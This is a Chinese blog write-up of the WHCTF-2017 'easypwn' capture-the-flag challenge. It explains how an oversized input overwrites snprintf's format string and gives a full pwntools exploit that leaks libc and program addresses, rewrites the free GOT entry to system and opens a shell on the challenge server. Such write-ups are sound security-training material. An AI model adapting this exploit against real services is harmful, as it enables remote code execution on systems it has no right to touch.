[XCTF-pwn] 36_xctf-4th-WHCTF-2017_easypwn

最新推荐文章于 2024-03-12 21:30:23 发布
最新推荐文章于 2024-03-12 21:30:23 发布
阅读量308 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123382860
版权

snprintf的格式化串中途被覆盖也会生效。

unsigned __int64 m1printf()
{
  char s[1024]; // [rsp+10h] [rbp-BF0h] BYREF
  char v2[1000]; // [rsp+410h] [rbp-7F0h] BYREF
  char v3[1024]; // [rsp+7F8h] [rbp-408h] BYREF
  unsigned __int64 v4; // [rsp+BF8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(s, 0, sizeof(s));
  memset(v3, 0, 8uLL);
  memset(v2, 0, 0x7E8uLL);
  strcpy(v3, "%s");
  puts("Welcome To WHCTF2017:");
  read(0, s, 0x438uLL);
  snprintf(v2, 0x7D0uLL, v3, s);
  printf("Your Input Is :%s\n", v2);
  return __readfsqword(0x28u) ^ v4;
}

s的长度比预定的要大,当复制到v2时可以覆盖到v3的格式化串,将其覆盖后会执行后部的命令。

难点就是计算偏移,一般printf在64位系统上是从6开始,这里加上0x3e8也就是125再加上输入格式化串2和地址1 一共是134就到了 b'A'*0x3e8+b'AA%xxx'.ljust(0x10, b'A')+p64(address),计算出大概位置后测试即可。第2个领衔就是libc_start_main_ret的偏移,从rsp到rbp再加1从6开始算就是398,前一个397是一个程序加载地址。

另外输出的时候由于前部%s未覆盖前已经有输出,输出数为1000+格式化串16+地址6(后两位为0不输出不计算)

解题思路:

  1. 泄露398和397的libc地址和加载地址
  2. 将system的6字节分3次写入got.free
  3. 调用addfree(/bin/sh)

完整exp:

from pwn import *

'''  
patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
patchelf --add-needed /home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so pwn
'''

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830
else:
    p = remote('111.200.241.244', 62589) 
    libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

def printf(msg):
    p.sendlineafter(b"Input Your Code:\n", b'1')
    p.sendafter(b"Welcome To WHCTF2017:\n", msg)

def addfree(msg):
    p.sendlineafter(b"Input Your Code:\n", b'2')
    p.sendafter(b"Input Your Name:\n", msg)

#gdb.attach(p)
#pause()

#for i in range(10):
#    printf(b'x'*0x3e8+ b'AA'+ f'%{130+i}$p'.encode().ljust(0x10-2, b'A')+ p64(0x12345678))
offset = 134
#RBP: 0x7ffe889faef0 --> 0x7ffe889faf30 --> 0x559e8be36da0 (push   r15)
#RSP: 0x7ffe889fa2f0 --> 0x0 
#0072| 0x7ffe889faf38 --> 0x7f22b8a14830 (<__libc_start_main+240>:	mov    edi,eax)
# (0x7ffe889faf38-0x7ffe889fa2f0)//8 = 393
printf(b'x'*0x3e8+ b'AA'+ b'%398$p'.ljust(0x10-2-1, b'A')+ b',')
p.recvuntil(b',')
libc_base = int(p.recvuntil(b'A', drop=True), 16) - libc_start_main_ret
libc_elf.address = libc_base
print('libc:', hex(libc_base))

printf(b'x'*0x3e8+ b'AA'+ b'%397$p'.ljust(0x10-2-1, b'A')+ b',')
p.recvuntil(b',')
pwn_base = int(p.recvuntil(b'A', drop=True), 16) - 0xda0
elf.address = pwn_base
print('pwn:', hex(pwn_base))

#got.free=system
sys1 = libc_elf.sym['system'] & 0xffff
sys2 = (libc_elf.sym['system']>>16) & 0xffff
sys3 = (libc_elf.sym['system']>>32) & 0xffff
#padding:1000 str:AA+xx 16 addr:6
printf(b'x'*0x3e8+ b'AA'+ f'%{sys1 - 1022}c%134$hn'.encode().ljust(0x10-2-1, b'A')+ p64(elf.got['free']))
printf(b'x'*0x3e8+ b'AA'+ f'%{sys2 - 1022}c%134$hn'.encode().ljust(0x10-2-1, b'A')+ p64(elf.got['free']+2))
printf(b'x'*0x3e8+ b'AA'+ f'%{sys3 - 1022}c%134$hn'.encode().ljust(0x10-2-1, b'A')+ p64(elf.got['free']+4))

addfree(b'/bin/sh')
p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-PWN进阶区-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 1876
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲区大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
【CTF REVERSE】WHCTF2017-CRACKME
weixin_30873847的博客
10-19 250
1、前言 假装大学生水一下CTF题目,常规思路。程序没有加壳,是VC写的MFC程序。 2、破题思路 1、MessageBox 下断点 2、找到提示错误字符串的函数B 3、跟踪函数 4、跟踪算法 3、实现过程 PEID查询无壳,进IDA查看字符串。 得到这个字符串的一个存放地址,向上跟踪到有这个字符串的地方,依稀可以看到加密后的Flag轮廓。 .data:00403254 aVSIK...
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3788
攻防世界-Pwn-new-easypwn
XCTF 4th-WHCTF-2017-CRACKME
qq_41252520的博客
07-30 609
查壳 分析 看图标就猜得出是MFC框架的,不过这次的MFC和之前遇到的不一样。主要是在载入主窗口的方式不一样,导致分析的难度也就不一样。 通过字符串索引,来到载入主窗口那个地方 这是以非模态的方式载入对话框。不管是模态还是非模态,这样的方式都表示着所有的消息处理函数均在类中。而MFC是个大类,所以得需要一些线索才能够找到大海里的那根针。 这个线索正是注册码错误时弹出的信息框,并...
XCTF 4th-WHCTF-2017——Note_sys
05-11 398
64位程序,没有开启NX  #条件竞争 程序逻辑 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <unistd.h> 4 #include <pthread.h> 5 #include <time.h> 6 #includ...
new-easy(pwn)
最新发布
m0_72827793的博客
03-12 1262
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
XCTF-HW-pipeline附件
11-09
附件
【XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
【XCTF-RE】新手练习区-re1.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
pwn学习之三
weixin_30877181的博客
10-27 230
whctf2017的一道pwn题sandbox,这道题提供了两个可执行文件加一个libc,两个可执行文件是一个vuln,一个sandbox,这是一道通过沙盒去保护vuln不被攻击的题目。 用ida打开vuln: 进入80485CB函数: 这里s给的空间是48但是输入是直到换行停止,这里就存在了栈溢出。但是这道题目开了CANARY,所以不能直接覆盖到返回地址。注意到这题,s的空间下面就...
EasyHook XCTF 4th-WHCTF-2017 攻防世界
qq_41071646的博客
06-02 1839
这个题 应该来说 也是很简单的 E9 -5 这些东西一看就知道了 是 hook 然后点进hook 里面就看出来很多东西 直接逆向算法 #include<stdio.h> #include<string.h> #include<algorithm> #include<vector> #include<iostream&...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3703
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
2017WHCTF - CRACKME
PangCtf的博客
09-24 1670
2017WHCTF CRACKME
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值